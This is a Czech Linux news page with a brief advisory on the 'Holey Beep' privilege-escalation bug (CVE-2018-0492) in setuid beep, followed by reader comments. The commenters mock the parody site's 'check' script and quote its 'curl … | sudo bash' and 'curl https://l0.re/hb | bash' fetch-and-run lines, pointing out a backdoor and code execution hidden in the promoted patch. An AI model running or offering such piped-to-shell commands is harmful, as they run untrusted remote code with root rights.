abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    včera 23:33 | IT novinky

    Čeští policisté společně se svými tureckými kolegy zadrželi 51 lidí, kteří se podle kriminalistů podíleli na provozu podvodného call centra v Istanbulu. Skupina je spojena s 1173 případy podvodů na českých občanech, při kterých vznikla škoda přes 553 milionů korun.

    Ladislav Hagara | Komentářů: 0
    3.7. 03:55 | Nová verze

    Immich byl vydán v nové verzi 3.0.0. Jedná se o alternativu k výchozím aplikacím od Googlu a Applu pro správu fotografií a videí umožňující vlastní hosting serveru Immich. K vyzkoušení je demo. Immich je součástí balíčků open source aplikací FUTO. Zdrojové kódy jsou k dispozici na GitHubu pod licencí AGPL-3.0.

    Ladislav Hagara | Komentářů: 5
    3.7. 02:55 | IT novinky

    Společnost Juno Computers prodávající počítače s předinstalovaným Linuxem má nově v nabídce linuxový tablet Juno Tab 4 - WiFi. Na výběr je Debian, Ubuntu a Kubuntu. Předobjednat jej lze za 949 liber (26 500 korun).

    Ladislav Hagara | Komentářů: 0
    3.7. 01:22 | Nová verze

    Podman (Pod Manager), nástroj umožňující vytvářet a provozovat kontejnery, aniž by uživatel potřeboval práva roota, byl vydán v nové major verzi 6.0.0. Přehled novinek v poznámkách k vydání. Řešena je i vážná bezpečnostní chyba CVE-2026-57231.

    Ladislav Hagara | Komentářů: 0
    3.7. 00:11 | IT novinky

    Společnost Sony oznámila, že od ledna 2028 přestane vydávat nové hry pro PlayStation na fyzických discích. Všechny budoucí tituly budou dostupné výhradně v digitální podobě na PlayStation Store.

    Ladislav Hagara | Komentářů: 6
    2.7. 16:55 | Nová verze

    Google Chrome 150 byl prohlášen za stabilní. Nejnovější stabilní verze 150.0.7871.46 přináší řadu novinek. Podrobný přehled v poznámkách k vydání. Opraveno bylo 433 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře.

    Ladislav Hagara | Komentářů: 0
    2.7. 13:00 | Nová verze

    Soudní dvůr Evropské unie potvrdil rekordní pokutu 4,125 miliardy eur (100 miliard Kč) americké technologické firmě Google ze skupiny Alphabet. Pokutu firmě v roce 2018 vyměřila Evropská komise (EK) za to, že Google podle ní zneužívá operačního systému Android k potlačení konkurence na trhu vyhledávacích služeb.

    Ladislav Hagara | Komentářů: 17
    2.7. 12:44 | IT novinky

    Administrativa amerického prezidenta Donalda Trumpa povolila firmě Anthropic obnovit plný přístup klientů k modelům umělé inteligence (AI) Fable 5 a Mythos 5. Ty byly nedostupné bezmála tři týdny kvůli bezpečnostním obavám vlády, třebaže americké ministerstvo obchodu minulý pátek povolilo omezený přístup k modelu Mythos 5 pro některé „důvěryhodné“ domácí organizace.

    Ladislav Hagara | Komentářů: 1
    2.7. 12:22 | Zajímavý článek

    Francúzska organizácia na ochranu spotrebiteľa, po viac než ôsmych rokoch skúmania, žaluje Epson za plánované zastarávanie tlačiarní. Súd sa začína dnes, 2. 7. 2026, vo francúzskom Nanterre.

    Vlado99 | Komentářů: 9
    2.7. 03:00 | Zajímavý software

    Erin Catto, autor open source 2D fyzikálního enginu Box2D (Wikipedie), představil nový 3D fyzikální engine Box3D. Engine je již používán ve hře The Legend of California.

    Ladislav Hagara | Komentářů: 0
    Které desktopové prostředí na Linuxu používáte?
     (11%)
     (8%)
     (2%)
     (17%)
     (31%)
     (4%)
     (6%)
     (2%)
     (16%)
     (25%)
    Celkem 2053 hlasů
     Komentářů: 30, poslední 3.4. 20:20
    Rozcestník


    Holey Beep, bezpečnostní chyba v programu beep

    V programu beep (advanced pc-speaker beeper) byla nalezena bezpečnostní chyba CVE-2018-0492. Má-li beep nastaven s-bit, je chyba zneužitelná k lokální eskalaci práv. Chyba dostala vlastní jméno: Holey Beep [Hacker News].

    4.4.2018 12:33 | Ladislav Hagara | Bezpečnostní upozornění


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    4.4.2018 12:51 marbu | skóre: 31 | blog: hromada
    Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
    Readme toho beep nástroje je docela poučné:
    What this means is that root can always make beep work (to the best of my knowledge!), and that any local user can make beep work, BUT a non-root remote user cannot use beep in it's natural state. What's worse, an xterm, or other x-session counts, as far as the kernel is concerned, as 'remote', so beep won't work from a non-priviledged xterm either. I had originally chalked this up to a bug, but there's actually nothing I can do about it, and it really is a Good Thing that the kernel does things this way. There is also a solution.

    By default beep is not installed with the suid bit set, because that would just be zany. On the other hand, if you do make it suid root, all your problems with beep bailing on ioctl calls will magically vanish, which is pleasant, and the only reason not to is that any suid program is a potential security hole. Conveniently, beep is very short, so auditing it is pretty straightforward.

    Decide for yourself, of course, but it looks safe to me - there's only one buffer and fgets doesn't let it overflow, there's only one file opening, and while there is a potential race condition there, it's with /dev/console. If someone can exploit this race by replacing /dev/console, you've got bigger problems. :)
    There is no point in being so cool in a cold world.
    4.4.2018 14:55 Lyco | skóre: 14 | blog: Lyco
    Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
    Ta stránka s infomracemi je skvělá. Vynikající parodie.

    Nejvíc se mi asi líbil "test jestli je počítač zranitelný":
    # curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash
    # nejsem blázen
    
    curl https://holeybeep.ninja/am_i_vulnerable.sh
    #!/bin/sh
    # TODO: Backdoor this machine?
    modprobe pcspkr
    beep -l 1000 -r 3 -f 44000
    
    Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.
    AsciiWolf avatar 4.4.2018 18:42 AsciiWolf | skóre: 41 | blog: Blog
    Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
    Tak v nynější verzi už ten backdoor skutečně je. :-D
    $ cat am_i_vulnerable.sh
    #!/bin/sh
    curl https://l0.re/hb | bash
    modprobe pcspkr
    beep -l 1000 -r 3 -f 44000
    5.4.2018 00:01 Semo | skóre: 45 | blog: Semo
    Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
    Code execution je aj v patchi propagovanom na https://holeybeep.ninja/
    If you hold a Unix shell up to your ear, you can you hear the C.
    5.4.2018 23:08 marbu | skóre: 31 | blog: hromada
    Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
    Eh, to je taky dobré. Viz: patch runs ed, and ed can run anything.
    There is no point in being so cool in a cold world.
    Ruža Becelin avatar 5.4.2018 14:20 Ruža Becelin | skóre: 40 | blog: RuzaBecelinBlog
    Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
    How do I uninstall Linux?

    Please follow these instructions.

    By me zajimalo, jestli podobne cenne rady udileji, pokud se najde chyba ve Windows...
    5.4.2018 14:55 Honza
    Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep
    Kdyz nejaky troll pak udela podobnou stranku, tak ano. Staci se podivat na commity...

    Založit nové vláknoNahoru


    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.